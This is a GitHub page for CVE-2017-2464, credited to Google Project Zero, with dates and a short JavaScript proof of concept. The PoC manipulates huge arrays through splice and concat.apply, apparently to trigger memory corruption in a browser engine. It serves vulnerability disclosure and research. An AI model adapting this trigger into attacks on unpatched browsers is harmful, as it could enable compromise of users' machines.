Skip to content

Latest commit

 

History

History
35 lines (23 loc) · 574 Bytes

CVE-2017-2464.md

File metadata and controls

35 lines (23 loc) · 574 Bytes
Raw

CVE-2017-2464

  • Report: Jan 2017
  • Fix: Mar 2017
  • Credit: Natalie Silvanovich, Google Project Zero

PoC

var a = [];
a.length = 0xffffff00;

var b = a.splice(0, 0x100000); // Undecided array

var args = [];
args.length = 4094;
args.fill(b);

var q = [];
q.length = 0x1000;
q.fill(7);

var c = a.splice(0, 0xfffef); //Shorter undecided array

args[4094] = c;
args[4095] = q;


b.concat.apply(b, args);

Reference